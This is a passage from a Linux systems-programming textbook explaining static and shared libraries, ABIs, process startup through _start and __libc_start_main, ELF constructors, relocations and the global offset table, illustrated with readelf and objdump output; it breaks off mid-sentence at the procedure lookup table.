5Archives created with ar pop up in a few different places around Linux systems other than just creating static libraries. One widely used application
is in the .deb packaging format used with Debian, Ubuntu and some other Linux systems is one example. debs use archives to keep all the
application files together in the one package file. Redhat RPM packages use an alternate but similar format called cpio. Of course the canonical
application for keeping files together is the tar file, which is a common format to distribute source code.
Behind the process
148You then specify the library to the compiler with -lname where name is the filename of the library without
the prefix lib. We also provide an extra search directory for libraries, namely the current directory ( -
L .), since by default the current directory is not searched for libraries.
The final result is a single executable with our new library included.
Static Linking Drawbacks
Static linking is very straight forward, but has a number of drawbacks.
There are two main disadvantages; firstly if the library code is updated (to fix a bug, say) you have to
recompile your program into a new executable and secondly, every program in the system that uses that
library contains a copy in it's executable. This is very inefficient (and a pain if you find a bug and have
to recompile, as per point one).
For example, the C library (glibc) is included in all programs, and provides all the common functions such
as printf.
Shared Libraries
Shared libraries are an elegant way around the problems posed by a static library. A shared library is a
library that is loaded dynamically at runtime for each application that requires it.
The application simply leaves pointers that it will require a certain library, and when the function call
is made the library is loaded into memory and executed. If the library is already loaded for another
application, the code can be shared between the two, saving considerable resources with commonly used
libraries.
This process, called dynamic linking, is one of the more intricate parts of a modern operating system. As
such, we dedicate the next chapter to investigating the dynamic linking process.
ABI's
An ABI is a term you will hear a lot about when working with systems programming. We have talked
extensively about API, which are interfaces the programmer sees to your code.
ABI's refer to lower level interfaces which the compiler, operating system and, to some extent, processor,
must agree on to communicate together. Below we introduce a number of concepts which are important
to understanding ABI considerations.
Byte Order
Endianess
Calling Conventions
Passing parameters
registers or stack?
Function Descriptors
On many architectures you must call a function through a function descriptor , rather than directly.
Behind the process
149For example, on IA64 a function descriptor consists of two components; the address of the function (that
being a 64 bit, or 8 byte value) and the address of the global pointer  (gp). The ABI specifies that r1 should
always contain the gp value for a function. This means that when you call a function, it is the callees  job
to save their gp value, set r1 to be the new value (from the function descriptor) and then call the function.
This may seem like a strange way to do things, but it has very useful practical implications as you will see
in the next chapter about global offset tables. On IA64 an add instruction can only take a maximum 22
bit immediate value6. An immediate value is one that is specified directly, rather than in a register (e.g. in
add r1 + 100  100 is the immediate value).
You might recognise 22 bits as being able to represent 4194304 bytes, or 4MB. Thus each function can
directly offset into an area of memory 4MB big without having to take the penalty of loading any values
into a register. If the compiler, linker and loader all agree on what the global pointer is pointing to (as
specified in the ABI) performance can be improved by less loading.
Starting a process
We mentioned before that simply saying the program starts with the main() function is not quite true.
Below we exaime what happens to a typical dynamically linked program when it is loaded and run
(statically linked programs are similar but different XXX should we go into this?).
Firstly, in response to an exec system call the kernel allocates the structures for a new process and reads
the ELF file specified from disk.
We mentioned that ELF has a program interpreter field, PT_INTERP , which can be set to 'interpret' the
program. For dynamically linked applications that interpreter is the dynamic linker, namely ld.so, which
allows some of the linking process to be done on the fly before the program starts.
In this case, the kernel also reads in the dynamic linker code, and starts the program from the entry point
address as specified by it. We examine the role of the dynamic linker in depth in the next chapter, but
suffice to say it does some setup like loading any libraries required by the application (as specified in the
dynamic section of the binary) and then starts execution of the program binary at it's entry point address
(i.e. the _init function).
Kernel communication to programs
The kernel needs to communicate some things to programs when they start up; namely the arguments to the
program, the current environment variables and a special structure called the Auxiliary Vector  or
auxv (you can request the the dynamic linker show you some debugging output of the auxv by specifying
the environment value LD_SHOW_AUXV=1 ).
The arguments and environment at fairly straight forward, and the various incarnations of the exec system
call allow you to specify these for the program.
The kernel communicates this by putting all the required information on the stack for the newly created
program to pick up. Thus when the program starts it can use it's stack pointer to find the all the startup
information required.
The auxiliary vector is a special structure that is for passing information directly from the kernel to the
newly running program. It contains system specific information that may be required, such as the default
size of a virtual memory page on the system or hardware capabilities ; that is specific features that the
kernel has identified the underlying hardware has that userspace programs can take advantage of.
6Technically this is because of the way IA64 bundles instructions. Three instructions are put into each bundle, and there is only enough room to
keep a 22 bit value to keep the bundle together.
Behind the process
150Kernel Library
We mentioned previously that system calls are slow, and modern systems have mechanisms to avoid the
overheads of calling a trap to the processor.
In Linux, this is implemented by a neat trick between the dyanmic loader and the kernel, all communicated
with the AUXV structure. The kernel actually adds a small shared library into the address space of every
newly created process which contains a function that makes system calls for you. The beauty of this system
is that if the underlying hardware supports a fast system call mechanism the kernel (being the creater of the
library) can use it, otherwise it can use the old scheme of generating a trap. This library is named linux-
gate.so.1 , so called because it is a gateway to the inner workings of the kernel.
When the kernel starts the dynamic linker it adds an entry to the auxv called AT_SYSINFO_EHDR , which
is the address in memory that the special kernel library lives in. When the dynamic linker starts it can look
for the AT_SYSINFO_EHDR  pointer, and if found load that library for the program. The program has no
idea this library exists; this is a private arrangement between the dynamic linker and the kernel.
We mentioned that programmers make system calls indirectly through calling functions in the system
libraries, namely libc. libc can check to see if the special kernel binary is loaded, and if so use the functions
within that to make system calls. As we mentioned, if the kernel determines the hardware is capable, this
will use the fast sytem call method.
Starting the program
Once the kernel has loaded the interpreter it passes it to the entry point as given in the interpreter file
(note will not examine how the dynamic linker starts at this stage; see Chapter 9, Dynamic Linking  for
a full discussion of dyanmic linking). The dynamic linker will jump to the entry point address as given
in the ELF binary.
Example 8.15. Disassembley of program startup
  1 
                  $ cat test.c
    
    int main(void)
  5 {
     return 0;
    }
    
    $ gcc -o test test.c
 10 
    $ readelf --headers ./test | grep Entry
      Entry point address:               0x80482b0
    
    $ objdump --disassemble ./test
 15 
    [...]
    
    080482b0 <_start>:
     80482b0:       31 ed                   xor    %ebp,%ebp
 20  80482b2:       5e                      pop    %esi
     80482b3:       89 e1                   mov    %esp,%ecx
     80482b5:       83 e4 f0                and    $0xfffffff0,%esp
Behind the process
151     80482b8:       50                      push   %eax
     80482b9:       54                      push   %esp
 25  80482ba:       52                      push   %edx
     80482bb:       68 00 84 04 08          push   $0x8048400
     80482c0:       68 90 83 04 08          push   $0x8048390
     80482c5:       51                      push   %ecx
     80482c6:       56                      push   %esi
 30  80482c7:       68 68 83 04 08          push   $0x8048368
     80482cc:       e8 b3 ff ff ff          call   8048284 <__libc_start_main@plt>
     80482d1:       f4                      hlt
     80482d2:       90                      nop
     80482d3:       90                      nop
 35 
    08048368 <main>:
     8048368:       55                      push   %ebp
     8048369:       89 e5                   mov    %esp,%ebp
     804836b:       83 ec 08                sub    $0x8,%esp
 40  804836e:       83 e4 f0                and    $0xfffffff0,%esp
     8048371:       b8 00 00 00 00          mov    $0x0,%eax
     8048376:       83 c0 0f                add    $0xf,%eax
     8048379:       83 c0 0f                add    $0xf,%eax
     804837c:       c1 e8 04                shr    $0x4,%eax
 45  804837f:       c1 e0 04                shl    $0x4,%eax
     8048382:       29 c4                   sub    %eax,%esp
     8048384:       b8 00 00 00 00          mov    $0x0,%eax
     8048389:       c9                      leave
     804838a:       c3                      ret
 50  804838b:       90                      nop
     804838c:       90                      nop
     804838d:       90                      nop
     804838e:       90                      nop
     804838f:       90                      nop
 55 
    08048390 <__libc_csu_init>:
     8048390:       55                      push   %ebp
     8048391:       89 e5                   mov    %esp,%ebp
     [...]
 60 
    08048400 <__libc_csu_fini>:
     8048400:       55                      push   %ebp
     [...]
                
Above we investigate the very simplest program. Using readelf we can see that the entry point is the
_start function in the binary. At this point we can see in the disassembley some values are pushed
onto the stack. The first value, 0x8048400  is the __libc_csu_fini  function; 0x8048390  is
the __libc_csu_init  and then finally 0x8048368 , the main() function. After this the value
__libc_start_main  function is called.
__libc_start_main  is defined in the glibc sources sysdeps/generic/libc-start.c . The
file function is quite complicated and hidden between a large number of defines, as it needs to be portable
across the very wide number of systems and architectures that glibc can run on. It does a number of specific
things related to setting up the C library which the average programmer does not need to worry about. The
next point where the library calls back into the program is to handle init code.
Behind the process
152init and fini are two special concepts that call parts of code in shared libraries that may need to
be called before the library starts or if the library is unloaded respectivley. You can see how this might
be useful for library programmers to setup variables when the library is started, or to clean up at the
end. Originally the functions _init and _fini were looked for in the library; however this became
somewhat limiting as everything was required to be in these functions. Below we will examine just how
the init/fini process works.
At this stage we can see that the __libc_start_main  function will receive quite a few input
paramaters on the stack. Firstly it will have access to the program arguments, environment variables and
auxiliary vector from the kernel. Then the initalization function will have pushed onto the stack addresses
for functions to handle init, fini, and finally the address of the main function it's self.
We need some way to indicate in the source code that a function should be called by init or fini. With
gcc we use attributes  to label two functions as constructors  and destructors  in our main program. These
terms are more commonly used with object orientent langauges to describe object lifecycles.
Example 8.16. Constructors and Destructors
  1 
                  $ cat test.c
    #include <stdio.h>
    
  5 void __attribute__((constructor)) program_init(void)  {
      printf("init\n");
    }
    
    void  __attribute__((destructor)) program_fini(void) {
 10   printf("fini\n");
    }
    
    int main(void)
    {
 15   return 0;
    }
    
    $ gcc -Wall  -o test test.c
    
 20 $ ./test
    init
    fini
    
    $ objdump --disassemble ./test | grep program_init
 25 08048398 <program_init>:
    
    $ objdump --disassemble ./test | grep program_fini
    080483b0 <program_fini>:
    
 30 $ objdump --disassemble ./test 
    
    [...]
    08048280 <_init>:
     8048280:       55                      push   %ebp
 35  8048281:       89 e5                   mov    %esp,%ebp
     8048283:       83 ec 08                sub    $0x8,%esp
Behind the process
153     8048286:       e8 79 00 00 00          call   8048304 <call_gmon_start>
     804828b:       e8 e0 00 00 00          call   8048370 <frame_dummy>
     8048290:       e8 2b 02 00 00          call   80484c0 <__do_global_ctors_aux>
 40  8048295:       c9                      leave
     8048296:       c3                      ret
    [...]
    
    080484c0 <__do_global_ctors_aux>:
 45  80484c0:       55                      push   %ebp
     80484c1:       89 e5                   mov    %esp,%ebp
     80484c3:       53                      push   %ebx
     80484c4:       52                      push   %edx
     80484c5:       a1 2c 95 04 08          mov    0x804952c,%eax
 50  80484ca:       83 f8 ff                cmp    $0xffffffff,%eax
     80484cd:       74 1e                   je     80484ed <__do_global_ctors_aux+0x2d>
     80484cf:       bb 2c 95 04 08          mov    $0x804952c,%ebx
     80484d4:       8d b6 00 00 00 00       lea    0x0(%esi),%esi
     80484da:       8d bf 00 00 00 00       lea    0x0(%edi),%edi
 55  80484e0:       ff d0                   call   *%eax
     80484e2:       8b 43 fc                mov    0xfffffffc(%ebx),%eax
     80484e5:       83 eb 04                sub    $0x4,%ebx
     80484e8:       83 f8 ff                cmp    $0xffffffff,%eax
     80484eb:       75 f3                   jne    80484e0 <__do_global_ctors_aux+0x20>
 60  80484ed:       58                      pop    %eax
     80484ee:       5b                      pop    %ebx
     80484ef:       5d                      pop    %ebp
     80484f0:       c3                      ret
     80484f1:       90                      nop
 65  80484f2:       90                      nop
     80484f3:       90                      nop
    
    
    $ readelf --sections ./test
 70 There are 34 section headers, starting at offset 0xfb0:
    
    Section Headers:
      [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
      [ 0]                   NULL            00000000 000000 000000 00      0   0  0
 75   [ 1] .interp           PROGBITS        08048114 000114 000013 00   A  0   0  1
      [ 2] .note.ABI-tag     NOTE            08048128 000128 000020 00   A  0   0  4
      [ 3] .hash             HASH            08048148 000148 00002c 04   A  4   0  4
      [ 4] .dynsym           DYNSYM          08048174 000174 000060 10   A  5   1  4
      [ 5] .dynstr           STRTAB          080481d4 0001d4 00005e 00   A  0   0  1
 80   [ 6] .gnu.version      VERSYM          08048232 000232 00000c 02   A  4   0  2
      [ 7] .gnu.version_r    VERNEED         08048240 000240 000020 00   A  5   1  4
      [ 8] .rel.dyn          REL             08048260 000260 000008 08   A  4   0  4
      [ 9] .rel.plt          REL             08048268 000268 000018 08   A  4  11  4
      [10] .init             PROGBITS        08048280 000280 000017 00  AX  0   0  4
 85   [11] .plt              PROGBITS        08048298 000298 000040 04  AX  0   0  4
      [12] .text             PROGBITS        080482e0 0002e0 000214 00  AX  0   0 16
      [13] .fini             PROGBITS        080484f4 0004f4 00001a 00  AX  0   0  4
      [14] .rodata           PROGBITS        08048510 000510 000012 00   A  0   0  4
      [15] .eh_frame         PROGBITS        08048524 000524 000004 00   A  0   0  4
 90   [16] .ctors            PROGBITS        08049528 000528 00000c 00  WA  0   0  4
Behind the process
154      [17] .dtors            PROGBITS        08049534 000534 00000c 00  WA  0   0  4
      [18] .jcr              PROGBITS        08049540 000540 000004 00  WA  0   0  4
      [19] .dynamic          DYNAMIC         08049544 000544 0000c8 08  WA  5   0  4
      [20] .got              PROGBITS        0804960c 00060c 000004 04  WA  0   0  4
 95   [21] .got.plt          PROGBITS        08049610 000610 000018 04  WA  0   0  4
      [22] .data             PROGBITS        08049628 000628 00000c 00  WA  0   0  4
      [23] .bss              NOBITS          08049634 000634 000004 00  WA  0   0  4
      [24] .comment          PROGBITS        00000000 000634 00018f 00      0   0  1
      [25] .debug_aranges    PROGBITS        00000000 0007c8 000078 00      0   0  8
100   [26] .debug_pubnames   PROGBITS        00000000 000840 000025 00      0   0  1
      [27] .debug_info       PROGBITS        00000000 000865 0002e1 00      0   0  1
      [28] .debug_abbrev     PROGBITS        00000000 000b46 000076 00      0   0  1
      [29] .debug_line       PROGBITS        00000000 000bbc 0001da 00      0   0  1
      [30] .debug_str        PROGBITS        00000000 000d96 0000f3 01  MS  0   0  1
105   [31] .shstrtab         STRTAB          00000000 000e89 000127 00      0   0  1
      [32] .symtab           SYMTAB          00000000 001500 000490 10     33  53  4
      [33] .strtab           STRTAB          00000000 001990 000218 00      0   0  1
    Key to Flags:
      W (write), A (alloc), X (execute), M (merge), S (strings)
110   I (info), L (link order), G (group), x (unknown)
      O (extra OS processing required) o (OS specific), p (processor specific)
    
    $ objdump --disassemble-all --section .ctors ./test
    
115 ./test:     file format elf32-i386
    
    Contents of section .ctors:
     8049528 ffffffff 98830408 00000000           ............
    
120             
The last value pushed onto the stack for the __libc_start_main  was the initalisation function
__libc_csu_init . If we follow the call chain through from __libc_csu_init  we can see it does
some setup and then calls the _init function in the executable. The _init function eventually calls a
function called __do_global_ctors_aux . Looking at the disassembley of this function we can see
that it appears to start at address 0x804952c  and loop along, reading an value and calling it. We can see
that this starting address is in the .ctors section of the file; if we have a look inside this we see that it
contains the first value -1, a function address (in big endian format) and the value zero.
The address in big endian format is 0x08048398 , or the address of program_init  function! So the
format of the .ctors section is firstly a -1, and then the address of functions to be called on initalisation,
and finally a zero to indicate the list is complete. Each entry will be called (in this case we only have the
one funtion).
Once __libc_start_main  has completed with the _init call it finally calls the main() function!
Remember that it had the stack setup initially with the arguments and environment pointers from the kernel;
this is how main gets it's argc, argv[], envp[]  arguments. The process now runs and the setup
phase is complete.
A similar process is enacted with the .dtors for destructors when the program exits.
__libc_start_main  calls these when the main() function completes.
As you can see, a lot is done before the program gets to start, and even a little after you think it is finished!
155Chapter 9. Dynamic Linking
Code Sharing
We know that for the operating system code is considered read only, and separate from data. It seems
logical then that if programs can not modify code and have large amounts of common code, instead of
replicating it for every executable it should be shared between many executables.
With virtual memory this can be easily done. The physical pages of memory the library code is loaded
into can be easily referenced by any number of virtual pages in any number of address spaces. So while
you only have one physical copy of the library code in system memory, every process can have access to
that library code at any virtual address it likes.
Thus people quickly came up with the idea of a shared library  which, as the name suggests, is shared by
multiple executables. Each executable contains a reference essentially saying "I need library foo". When
the program is loaded, it is up to the system to either check if some other program has already loaded the
code for library foo into memory, and thus share it by mapping pages into the executable for that physical
memory, or otherwise load the library into memory for the executable.
This process is called dynamic linking  because it does part of the linking process "on the fly" as programs
are executed in the system.
Dynamic Library Details
Libraries are very much like a program that never gets started. They have code and data sections (functions
and variables) just like every executable; but no where to start running. They just provide a library of
functions for developers to call.
Thus ELF can represent a dynamic library just as it does an executable. There are some fundamental
differences, such as there is no pointer to where execution should start, but all shared libraries are just ELF
objects like any other executable.
The ELF header has two mutually exclusive flags, ET_EXEC  and ET_DYN to mark an ELF file as either
an executable or a shared object file.
Including libraries in an executable
Compilation
When you compile your program that uses a dynamic library, object files are left with references to the
library functions just as for any other external reference.
You need to include the header for the library so that the compiler knows the specific types of the functions
you are calling. Note the compiler only needs to know the types associated with a function (such as, it
takes an int and returns a char *) so that it can correctly allocate space for the function call.1
1This has not always been the case with the C standard. Previously, compilers would assume that any function it did not know about returned an
int. On a 32 bit system, the size of a pointer is the same size as an int, so there was no problem. However, with a 64 bit system, the size of a
pointer is generally twice the size of an int so if the function actually returns a pointer, its value will be destroyed. This is clearly not acceptable, as
the pointer will thus not point to valid memory. The C99 standard has changed such that you are required to specify the types of included functions.
Dynamic Linking
156Linking
Even though the dynamic linker  does a lot of the work for shared libraries, the traditional linker still has
a role to play in creating the executable.
The traditional linker needs to leave a pointer in the executable so that the dynamic linker knows what
library will satisfy the dependencies at runtime.
The dynamic  section of the executable requires a NEEDED entry for each shared library that the
executable depends on.
Again, we can inspect these fields with the readelf  program. Below we have a look at a very standard
binary, /bin/ls
Example 9.1. Specifying Dynamic Libraries
  1 
                  $ readelf --dynamic /bin/ls 
    
    Dynamic segment at offset 0x22f78 contains 27 entries:
  5   Tag        Type                         Name/Value
     0x0000000000000001 (NEEDED)             Shared library: [librt.so.1]
     0x0000000000000001 (NEEDED)             Shared library: [libacl.so.1]
     0x0000000000000001 (NEEDED)             Shared library: [libc.so.6.1]
     0x000000000000000c (INIT)               0x4000000000001e30
 10  ... snip ...
                
You can see that it specifies three libraries. The most common library shared by most, if not all, programs
on the system is libc. There are also some other libraries that the program needs to run correctly.
Reading the ELF file directly is sometimes useful, but the usual way to inspect a dynamically linked
executable is via ldd. ldd "walks" the dependencies of libraries for you; that is if a library depends on
another library, it will show it to you.
Example 9.2. Looking at dynamic libraries
  1 
                  $ ldd /bin/ls
            librt.so.1 => /lib/tls/librt.so.1 (0x2000000000058000)
            libacl.so.1 => /lib/libacl.so.1 (0x2000000000078000)
  5         libc.so.6.1 => /lib/tls/libc.so.6.1 (0x2000000000098000)
            libpthread.so.0 => /lib/tls/libpthread.so.0 (0x20000000002e0000)
            /lib/ld-linux-ia64.so.2 => /lib/ld-linux-ia64.so.2 (0x2000000000000000)
            libattr.so.1 => /lib/libattr.so.1 (0x2000000000310000)
    $ readelf --dynamic /lib/librt.so.1
 10 
    Dynamic segment at offset 0xd600 contains 30 entries:
      Tag        Type                         Name/Value
     0x0000000000000001 (NEEDED)             Shared library: [libc.so.6.1]
     0x0000000000000001 (NEEDED)             Shared library: [libpthread.so.0]
 15  ... snip ...
    
Dynamic Linking
157                
We can see above that libpthread  has been required from somewhere. If we do a little digging, we
can see that the requirement comes from librt.
The Dynamic Linker
The dynamic linker is the program that manages shared dynamic libraries on behalf of an executable. It
works to load libraries into memory and modify the program at runtime to call the functions in the library.
ELF allows executables to specify an interpreter , which is a program that should be used to run the
executable. The compiler and static linker set the interpreter of executables that rely on dynamic libraries
to be the dynamic linker.
Example 9.3. Checking the program interpreter
  1 
                  ianw@lime:~/programs/csbu$ readelf --headers /bin/ls
    
    Program Headers:
  5   Type           Offset             VirtAddr           PhysAddr
                     FileSiz            MemSiz              Flags  Align
      PHDR           0x0000000000000040 0x4000000000000040 0x4000000000000040
                     0x0000000000000188 0x0000000000000188  R E    8
      INTERP         0x00000000000001c8 0x40000000000001c8 0x40000000000001c8
 10                  0x0000000000000018 0x0000000000000018  R      1
          [Requesting program interpreter: /lib/ld-linux-ia64.so.2]
      LOAD           0x0000000000000000 0x4000000000000000 0x4000000000000000
                     0x0000000000022e40 0x0000000000022e40  R E    10000
      LOAD           0x0000000000022e40 0x6000000000002e40 0x6000000000002e40
 15                  0x0000000000001138 0x00000000000017b8  RW     10000
      DYNAMIC        0x0000000000022f78 0x6000000000002f78 0x6000000000002f78
                     0x0000000000000200 0x0000000000000200  RW     8
      NOTE           0x00000000000001e0 0x40000000000001e0 0x40000000000001e0
                     0x0000000000000020 0x0000000000000020  R      4
 20   IA_64_UNWIND   0x0000000000022018 0x4000000000022018 0x4000000000022018
                     0x0000000000000e28 0x0000000000000e28  R      8
    
                
You can see above that the interpreter is set to be /lib/ld-linux-ia64.so.2, which is the dynamic linker.
When the kernel loads the binary for execution, it will check if the PT_INTERP  field is present, and if
so load what it points to into memory and start it.
We mentioned that dynamically linked executables leave behind references that need to be fixed with
information that isn't available until runtime, such as the address of a function in a shared library. The
references that are left behind are called relocations .
Relocations
The essential part of the dynamic linker is fixing up addresses at runtime, which is the only time you can
know for certain where you are loaded in memory. A relocation can simply be thought of as a note that a
Dynamic Linking
158particular address will need to be fixed at load time. Before the code is ready to run you will need to go
through and read all the relocations and fix the addresses it refers to to point to the right place.
Table 9.1. Relocation Example
Address Action
0x123456 Address of symbol "x"
0x564773 Function X
There are many types of relocation for each architecture, and each types exact behaviour is documented
as part of the ABI for the system. The definition of a relocation is quite straight forward.
Example 9.4. Relocation as defined by ELF
  1 
                  typedef struct {
      Elf32_Addr    r_offset;  <--- address to fix
      Elf32_Word    r_info;    <--- symbol table pointer and relocation type
  5 }
    
    typedef struct {
      Elf32_Addr    r_offset;
      Elf32_Word    r_info;
 10   Elf32_Sword   r_addend;
    } Elf32_Rela
    
                
The r_offset  field refers to the offset in the file that needs to be fixed up. The r_info field specifies the
type of relocation which describes what exactly must be done to fix this code up. The simplest relocation
usually defined for an architecture is simply the value of the symbol. In this case you simply substitute the
address of the symbol at the location specified, and the relocation has been "fixed-up".
The two types, one with an addend and one without specify different ways for the relocation to operate.
An addend is simply something that should be added to the fixed up address to find the correct address.
For example, if the relocation is for the symbol i because the original code is doing something like i[8]
the addend will be set to 8. This means "find the address of i, and go 8 past it".
That addend value needs to be stored somewhere. The two solutions are covered by the two forms. In the
REL form the addend is actually store in the program code in the place where the fixed up address should
be. This means that to fix up the address properly, you need to first read the memory you are about to fix
up to get any addend, store that, find the "real" address, add the addend to it and then write it back (over
the addend). The RELA format specifies the addend right there in the relocation.
The trade offs of each approach should be clear. With REL you need to do an extra memory reference to
find the addend before the fixup, but you don't waste space in the binary because you use relocation target
memory. With RELA you keep the addend with the relocation, but waste that space in the on disk binary.
Most modern systems use RELA relocations.
Relocations in action
The example below shows how relocations work. We create two very simple shared libraries and reference
one from in the other.
Dynamic Linking
159Example 9.5. Specifying Dynamic Libraries
  1 
                  $ cat addendtest.c
    extern int i[4];
    int *j = i + 2;
  5 
    $ cat addendtest2.c
    int i[4];
    
    $ gcc -nostdlib -shared -fpic -s -o addendtest2.so addendtest2.c
 10 $ gcc -nostdlib -shared -fpic -o addendtest.so addendtest.c ./addendtest2.so
    
    $ readelf -r ./addendtest.so
    
    Relocation section '.rela.dyn' at offset 0x3b8 contains 1 entries:
 15   Offset          Info           Type           Sym. Value    Sym. Name + Addend
    0000000104f8  000f00000027 R_IA64_DIR64LSB   0000000000000000 i + 8
    
                
We thus have one relocation in addendtest.so  of type R_IA64_DIR64LSB . If you look this up in
the IA64 ABI, the acronym can be broken down to
1.R_IA64 : all relocations start with this prefix.
2.DIR64 : a 64 bit direct type relocation
3.LSB : Since IA64 can operate in big and little endian modes, this relocation is little endian (least
significant byte).
The ABI continues to say that that relocation means "the value of the symbol pointed to by the relocation,
plus any addend". We can see we have an addend of 8, since sizeof(int) == 4  and we have moved
two int's into the array ( *j = i + 2 ). So at runtime, to fix this relocation you need to find the address
of symbol i and put it's value, plus 8 into 0x104f8 .
Position Independence
In an executable  file, the code and data segment is given a specified base address in virtual memory. The
executable code is not shared, and each executable gets its own fresh address space. This means that the
compiler knows exactly where the data section will be, and can reference it directly.
Libraries have no such guarantee. They can know that their data section will be a specified offset from the
base address; but exactly where that base address is can only be known at runtime.
Consequently all libraries must be produced with code that can execute no matter where it is put into
memory, known as position independent code  (or PIC for short). Note that the data section is still a fixed
offset from the code section; but to actually find the address of data the offset needs to be added to the
load address.
Global Offset Tables
You might have noticed a critical problem with relocations when thinking about the goals of a shared
library. We mentioned previously that the big advantage of a shared library with virtual memory is that
multiple programs can use the code in memory by sharing of pages.
Dynamic Linking
160The problem stems from the fact that libraries have no guarantee about where they will be put into memory.
The dynamic linker will find the most convenient place in virtual memory for each library required and
place it there. Think about the alternative if this were not to happen; every library in the system would
require its own chunk of virtual memory so that no two overlapped. Every time a new library were added
to the system it would require allocation. Someone could potentially be a hog and write a huge library,
not leaving enough space for other libraries! And chances are, your program doesn't ever want to use that
library anyway.
Thus, if you modify the code of a shared library with a relocation, that code no longer becomes sharable.
We've lost the advantage of our shared library.
Below we explain the mechanism for doing this.
The Global Offset Table
So imagine the situation where we take the value of a symbol. With only relocations, we would have the
dynamic linker look up the memory address of that symbol and re-write the code to load that address.
A fairly straight forward enhancement would be to set aside space in our binary to hold the address of that
symbol, and have the dynamic linker put the address there rather than in the code directly. This way we
never need to touch the code part of the binary.
The area that is set aside for these addresses is called the Global Offset Table, or GOT. The GOT lives
in a section of the ELF file called .got.
Dynamic Linking
161Figure 9.1. Memory access via the GOT
PROCESS 1
MEMORYPHYSICALGOT/PLT
GOT/PLT
LIBRARY CODELIBRARY CODE
SHARED VARIABLE
VIRTUAL ADDRESSESPROCESS 2
The GOT is private to each process, and the process must have write permissions to it. Conversely the
library code is shared and the process should have only read and execute permissions on the code; it would
be a serious security breach if the process could modify code.
The GOT in action
Example 9.6. Using the GOT
  1 
                  $ cat got.c
    extern int i;
    
  5 void test(void)
Dynamic Linking
162    {
            i = 100;
    }
    
 10 $ gcc -nostdlib  -shared -o got.so ./got.c
    
    $ objdump --disassemble ./got.so
    
    ./got.so:     file format elf64-ia64-little
 15 
    Disassembly of section .text:
    
    0000000000000410 <test>:
     410:   0d 10 00 18 00 21       [MFI]       mov r2=r12
 20  416:   00 00 00 02 00 c0                   nop.f 0x0
     41c:   81 09 00 90                         addl r14=24,r1;;
     420:   0d 78 00 1c 18 10       [MFI]       ld8 r15=[r14]
     426:   00 00 00 02 00 c0                   nop.f 0x0
     42c:   41 06 00 90                         mov r14=100;;
 25  430:   11 00 38 1e 90 11       [MIB]       st4 [r15]=r14
     436:   c0 00 08 00 42 80                   mov r12=r2
     43c:   08 00 84 00                         br.ret.sptk.many b0;;
    
    $ readelf --sections ./got.so
 30 There are 17 section headers, starting at offset 0x640:
    
    Section Headers:
      [Nr] Name              Type             Address           Offset
           Size              EntSize          Flags  Link  Info  Align
 35   [ 0]                   NULL             0000000000000000  00000000
           0000000000000000  0000000000000000           0     0     0
      [ 1] .hash             HASH             0000000000000120  00000120
           00000000000000a0  0000000000000004   A       2     0     8
      [ 2] .dynsym           DYNSYM           00000000000001c0  000001c0
 40        00000000000001f8  0000000000000018   A       3     e     8
      [ 3] .dynstr           STRTAB           00000000000003b8  000003b8
           000000000000003f  0000000000000000   A       0     0     1
      [ 4] .rela.dyn         RELA             00000000000003f8  000003f8
           0000000000000018  0000000000000018   A       2     0     8
 45   [ 5] .text             PROGBITS         0000000000000410  00000410
           0000000000000030  0000000000000000  AX       0     0     16
      [ 6] .IA_64.unwind_inf PROGBITS         0000000000000440  00000440
           0000000000000018  0000000000000000   A       0     0     8
      [ 7] .IA_64.unwind     IA_64_UNWIND     0000000000000458  00000458
 50        0000000000000018  0000000000000000  AL       5     5     8
      [ 8] .data             PROGBITS         0000000000010470  00000470
           0000000000000000  0000000000000000  WA       0     0     1
      [ 9] .dynamic          DYNAMIC          0000000000010470  00000470
           0000000000000100  0000000000000010  WA       3     0     8
 55   [10] .got              PROGBITS         0000000000010570  00000570
           0000000000000020  0000000000000000 WAp       0     0     8
      [11] .sbss             NOBITS           0000000000010590  00000590
           0000000000000000  0000000000000000   W       0     0     1
      [12] .bss              NOBITS           0000000000010590  00000590
Dynamic Linking
163 60        0000000000000000  0000000000000000  WA       0     0     1
      [13] .comment          PROGBITS         0000000000000000  00000590
           0000000000000026  0000000000000000           0     0     1
      [14] .shstrtab         STRTAB           0000000000000000  000005b6
           000000000000008a  0000000000000000           0     0     1
 65   [15] .symtab           SYMTAB           0000000000000000  00000a80
           0000000000000258  0000000000000018          16    12     8
      [16] .strtab           STRTAB           0000000000000000  00000cd8
           0000000000000045  0000000000000000           0     0     1
    Key to Flags:
 70   W (write), A (alloc), X (execute), M (merge), S (strings)
      I (info), L (link order), G (group), x (unknown)
      O (extra OS processing required) o (OS specific), p (processor specific)
    
                
Above we create a simple shared library which refers to an external symbol. We do not know the address
of this symbol at compile time, so we leave it for the dynamic linker to fix up at runtime.
But we want our code to remain sharable, in case other processes want to use our code as well.
The disassembly reveals just how we do this with the .got. On IA64 (the architecture which the library
was compiled for) the register r1 is known as the global pointer  and always points to where the .got
section is loaded into memory.
If we have a look at the readelf  output we can see that the .got section starts 0x10570 bytes past
where library was loaded into memory. Thus if the library were to be loaded into memory at address
0x6000000000000000 the .got would be at 0x6000000000010570, and register r1 would always point
to this address.
Working backwards through the disassembly, we can see that we store the value 100 into the memory
address held in register r15. If we look back we can see that register 15 holds the value of the memory
address stored in register 14. Going back one more step, we see we load this address is found by adding
a small number to register 1. The GOT is simply a big long list of entries, one for each external variable.
This means that the GOT entry for the external variable i is stored 24 bytes (that is 3 64 bit addresses).
Example 9.7. Relocations against the GOT
  1 
                  $ readelf --relocs ./got.so
    
    Relocation section '.rela.dyn' at offset 0x3f8 contains 1 entries:
  5   Offset          Info           Type           Sym. Value    Sym. Name + Addend
    000000010588  000f00000027 R_IA64_DIR64LSB   0000000000000000 i + 0
    
                
We can also check out the relocation for this entry too. The relocation says "replace the value at offset
10588 with the memory location that symbol i is stored at".
We know that the .got starts at offset 0x10570 from the previous output. We have also seen how the
code loads an address 0x18 (24 in decimal) past this, giving us an address of 0x10570 + 0x18 = 0x10588 ...
the address which the relocation is for!
So before the program begins, the dynamic linker will have fixed up the relocation to ensure that the value
of the memory at offset 0x10588 is the address of the global variable i!
Dynamic Linking
164Libraries
The Procedure Lookup Table
Libraries may contain many functions, and a program may end up including many libraries to get its work
done. A program may only use one or two functions from each library of the many available, and depending
on the run-time path through the code may use some functions and not others.
As we have seen, the process of dynamic linking is a fairly computationally intensive one, since it involves
looking up and searching through many tables. Anything that can be done to reduce the overheads will
increase performance.
The Procedure Lookup Table (PLT) facilitates what is called lazy binding  in programs. Binding is
